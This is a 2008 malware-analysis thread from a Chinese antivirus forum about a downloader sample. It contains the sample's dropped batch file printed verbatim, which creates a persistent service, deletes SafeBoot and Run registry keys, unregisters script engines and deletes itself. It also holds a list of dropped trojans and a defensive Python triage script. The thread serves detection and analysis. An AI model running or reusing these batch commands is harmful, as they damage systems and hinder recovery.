Views: 5111 | Replies: 22

[Virus sample] Strange downloader, experts take a look

zzh161
Posted on 2008-2-1 16:34:45
Not many AVs flag this downloader, and the place it connects out to turned out to be even stranger.

Downloader:

All the TXT files it pulls down are the same one:

ht_ok
5150
58.49.58.20
8080


Accessing 58.49.58.20:8080 over FTP does nothing. Over HTTP, http://58.49.58.20 is an admin backend, and logging in with the username and password above doesn't work.
Looking at the page source there is this section:
<SCRIPT language=JavaScript>
function TopRegFormCheck() {
  if(document.TopRegForm.card.value.length<6) {
   alert("用户不能为空或长度不对")
   document.TopRegForm.card.focus();
   return false;
  }  
  if(document.TopRegForm.pass.value.length<6) {
   alert("密码不能为空或长度不对")
   document.TopRegForm.pass.focus();
   return false;
  }
  return true;
}

function SiteUserReg(){
  alert("请发信给我们,写明您的帐号和域名,我们核对无误后,才会给您回复")
}
</SCRIPT>



I'm stuck; no idea what this downloader is trying to download.

[ Last edited by zzh161 on 2008-2-1 16:35 ]

冷冷
Posted on 2008-2-1 16:38:45
IKARUS / ClamAV: nothing detected
--------------------------------

Contents of 150231887.bat:
date 2004-08-17
time 19:59:58.00
ping 127.0.0.1 -n 5
sc.exe create ras32lenovo BinPath= "D:\WINDOWS\system32\ras32lenovo.exe" type= own type= interact start= auto DisplayName= ras32lenovo
sc.exe description ras32lenovo 向逻辑磁盘管理器管理服务发送卷的信息以便配置。如果此服务被终止,动态磁盘状态和配置信息会过时。如果此服务被禁用,任何依赖它的服务将无法启动
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll

reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start ras32lenovo
regsvr32.exe /s D:\WINDOWS\system32\windowsWatch.dll
regsvr32.exe /s D:\WINDOWS\system32\windowsWatch.dll
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
ping 127.0.0.1 -n 6
del "I:\virus\test\2.EXE" /F
date 2008-02-01
time 16:38:29
del %0
exit




There is also more network activity; not listing it all..

[ Last edited by 冷_冷 on 2008-2-1 16:55 ]
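A static triage pass over a batch file like the 150231887.bat dump above is a quick way to spot the behaviours that matter to a defender before anything is run: an auto-start service being created with sc.exe, SafeBoot entries being deleted (which leaves the machine unable to boot into Safe Mode, so a rescue boot has to be done from external media), the whole HKLM Run key being deleted with /F (legitimate autoruns are wiped along with anything else), script engines such as vbscript.dll being unregistered, the system clock being rolled back and then restored (file timestamps created in between will be misleading during timeline analysis), and the script deleting itself with del %0. The following Python is an added example written for this thread; it is not code from the post or from any tool named here. The rules are my own heuristics, and the sample input is a subset of the lines from the batch file posted above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample input: lines copied from the 150231887.bat dump in the post above.
SAMPLE_BAT = r"""date 2004-08-17
time 19:59:58.00
ping 127.0.0.1 -n 5
sc.exe create ras32lenovo BinPath= "D:\WINDOWS\system32\ras32lenovo.exe" type= own type= interact start= auto DisplayName= ras32lenovo
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s vbscript.dll
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start ras32lenovo
regsvr32.exe /s D:\WINDOWS\system32\windowsWatch.dll
date 2008-02-01
del %0
exit
"""


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the batch file
    tag: str       # behaviour tag from RULES
    command: str   # the offending line, stripped


# (tag, regex). Heuristic rules (my own, not from any product) for behaviours
# seen in the dropped batch file. Matching is case-insensitive because cmd.exe is.
RULES = [
    # sc create ... start= auto: a service that starts on every boot
    ("service_persistence", re.compile(r"^sc(\.exe)?\s+create\b.*\bstart=\s*auto", re.I)),
    # Removing SafeBoot\Minimal or \Network entries breaks Safe Mode boot
    ("safeboot_sabotage", re.compile(r"^reg(\.exe)?\s+delete\b.*\\SafeBoot\\", re.I)),
    # Deleting the Run key itself (not a single value) wipes all autoruns under it
    ("run_key_wipe", re.compile(r"^reg(\.exe)?\s+delete\b.*\\CurrentVersion\\Run\b", re.I)),
    # regsvr32 /u of system DLLs (script engines, image viewer, ITSS)
    ("script_engine_unregister", re.compile(r"^regsvr32(\.exe)?\b.*\s/u\b.*\.dll", re.I)),
    # regsvr32 registering a DLL given by absolute path (no /u present)
    ("dll_register_from_path", re.compile(r"^regsvr32(\.exe)?\b(?!.*\s/u\b).*\s[A-Za-z]:\\.*\.dll", re.I)),
    # date/time followed by a value: the script sets the system clock
    ("clock_tamper", re.compile(r"^(date|time)\s+\d", re.I)),
    # del %0: the batch file deletes itself
    ("self_delete", re.compile(r"^del\s+%0\b", re.I)),
]


def triage_batch(text: str) -> list[Finding]:
    """Return one Finding per (line, matching rule), in file order."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        for tag, rx in RULES:
            if rx.search(line):
                findings.append(Finding(line_no, tag, line))
    return findings


def tags_of(findings: list[Finding]) -> list[str]:
    """Distinct behaviour tags, sorted, for a quick summary."""
    return sorted({f.tag for f in findings})


def verdict(findings: list[Finding]) -> str:
    """Coarse verdict: SafeBoot sabotage, or persistence plus self-deletion,
    is enough on its own; any other hit is merely suspicious."""
    seen = {f.tag for f in findings}
    if "safeboot_sabotage" in seen or {"service_persistence", "self_delete"} <= seen:
        return "malicious"
    return "suspicious" if seen else "clean"


if __name__ == "__main__":
    found = triage_batch(SAMPLE_BAT)
    for f in found:
        print(f"line {f.line_no:2d}  {f.tag:<26} {f.command}")
    print("verdict:", verdict(found), "tags:", ", ".join(tags_of(found)))
```

Run it on any .bat you pull out of a sandbox; the line numbers let you jump straight to the command that triggered a rule. The verdict function is deliberately coarse: clock changes and registering a DLL by path also occur in benign installers, so on their own they only rate "suspicious".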

gho
Posted on 2008-2-1 16:38:55
FS miss; MDF detected network activity
啊弥陀佛
Posted on 2008-2-1 16:54:31
微点 (Micropoint) kills it

llgiggs
Posted on 2008-2-1 16:57:16
红伞 (Avira) ignores it
zzh161 (OP)
Posted on 2008-2-1 16:57:20

Reply to post #2 by 冷_冷

The question is what it actually ends up downloading.
冷冷
Posted on 2008-2-1 16:58:43

Reply to post #6 by zzh161

Lots of stuff. Scanned it with 皇帝, nothing detected.

But once it's running, lots of malware.

[ Last edited by 冷_冷 on 2008-2-1 17:17 ]
冷冷
Posted on 2008-2-1 17:04:46
A lot of stuff this time.

大蜘蛛 (Dr.Web) results:
Wn_Sys8x.Sys;I:\VS\VIRUS\drive\D\Program Files\Internet Explorer\PLUGINS;Trojan.PWS.Lineage.origin;;
cmdbcs.exe;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.origin;;
dtbqespn.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
jpgmtulkv.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
Kvsc3.exE;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.2787;;
qveslvef.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
WinForm.exE;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.3090;;
auhad.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\auhad.dll;Trojan.PWS.Wsgame.3190;;
auhad.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\auhad.dll;Trojan.PWS.Wsgame.3189;;
auhad.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
cmdbcs.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;可能 DLOADER.Trojan;;
gnaixnauhqq.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3118;;
gnolnait.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\gnolnait.dll;Trojan.PWS.Wsgame.3233;;
gnolnait.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\gnolnait.dll;Trojan.PWS.Wsgame.3235;;
gnolnait.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
HHHCompress.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Gamania.7288;;
iqnauhc.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\iqnauhc.dll;Trojan.PWS.Wsgame.3190;;
iqnauhc.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\iqnauhc.dll;Trojan.PWS.Wsgame.3189;;
iqnauhc.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
Kvsc3.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;可能 DLOADER.Trojan;;
naixuhz.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3193;;
utgnehz.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\utgnehz.dll;Trojan.PWS.Wsgame.3185;;
utgnehz.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\utgnehz.dll;Trojan.PWS.Wsgame.3164;;
utgnehz.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
WinForm.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3089;;
yjscmucwow.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Gamania.7288;;
pop.sys;I:\VS\VIRUS\drive\D\WINDOWS\system32\DRIVERS;Trojan.NtRootKit.740;;
tmp108.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.DownLoader.45214;;
tmp109.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.DownLoader.45214;;
tmp10B.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3090;;
tmp10C.tmp;I:\VS\VIRUS\drive\I\Temp;可能 BACKDOOR.Trojan;;
tmp10D.tmp;I:\VS\VIRUS\drive\I\Temp;可能 BACKDOOR.Trojan;;
tmp113.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3233;;
tmp114.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp117.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3185;;
tmp118.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp11B.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp11C.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Lineage.origin;;
tmp11F.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp121.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp122.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.origin;;
tmp125.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp126.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.2787;;
tmp127.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3104;;
tmp12A.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3106;;
11[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;Trojan.PWS.Wsgame.origin;;
1[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;Trojan.PWS.Wsgame.3090;;
3[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;可能 BACKDOOR.Trojan;;
014[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.DownLoader.43172;;
12[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.PWS.Wsgame.2787;;
4[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.PWS.Gamania.7288;;
dod[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;可能 MULDROP.Trojan;;
8[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\X3R4EWD7;Trojan.PWS.Wsgame.3196;;
10[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3196;;
13[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3104;;
14[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.DownLoader.43172;;
2[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;可能 BACKDOOR.Trojan;;
7[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3196;;
9[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Lineage.origin;;
down[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.DownLoader.45214;;
ntuser.com;I:\VS\VIRUS\drive\I\virus;Trojan.DownLoader.43172;;
cike.com;I:\VS\VIRUS\drive\I\virus\test;Trojan.DownLoader.45214;;




That's basically all of it.

[ Last edited by 冷_冷 on 2008-2-1 17:16 ]

Graybird
Posted on 2008-2-1 17:13:18
The file '2.EXE' has been determined to be 'MALWARE'. Our analysts named the threat TR/Drop.Agent.61440. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system. Detection will be added to our virus definition file (VDF) with one of the next updates.
醉一生爱妍
Posted on 2008-2-1 17:17:42
费尔 (Filseclab) miss; its dynamic monitor reports it as low risk (changing the system time is high-risk behaviour and it still reports low...). Submitted it.
Copyright © KaFan  KaFan.cn All Rights Reserved.